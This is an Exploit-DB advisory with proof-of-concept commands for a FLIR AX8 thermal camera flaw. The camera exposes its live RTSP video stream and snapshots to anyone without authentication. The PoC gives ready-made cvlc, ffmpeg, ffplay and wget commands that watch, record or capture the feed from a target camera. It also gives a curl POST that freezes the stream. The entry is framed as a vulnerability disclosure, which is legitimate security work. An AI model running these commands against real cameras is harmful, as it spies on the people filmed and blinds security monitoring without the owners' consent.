FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure

EDB-ID: 45606
Author: LiquidWorm
Published: 2018-10-15
CVE: N/A
Type: Webapps
Platform: Hardware
Vulnerable App: N/A

 # Author: Gjoko 'LiquidWorm' Krstic @zeroscience 
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3, Hardware: Flir Systems Neco Board
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
# References:
# Advisory ID: ZSL-2018-5492
# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5492.php

# Desc: The FLIR AX8 thermal sensor camera suffers an unauthenticated and unauthorized
# live RTSP video stream access.

# PoC

$ cvlc rtsp://TARGET/mpeg4 --fullscreen
$ ffmpeg -i rtsp://TARGET/mpeg4 -b 7000k -vcodec copy -r 60 -y ./meltdown.mp4
$ ffplay rtsp://TARGET/mpeg4
$ wget http://TARGET/snapshot.jpg ; eog snapshot.jpg

# PoC - To freeze the stream:

$ curl -d "action=set&resource=.image.state.freeze.set&value=true" -X POST http://TARGET/res.php

Related Posts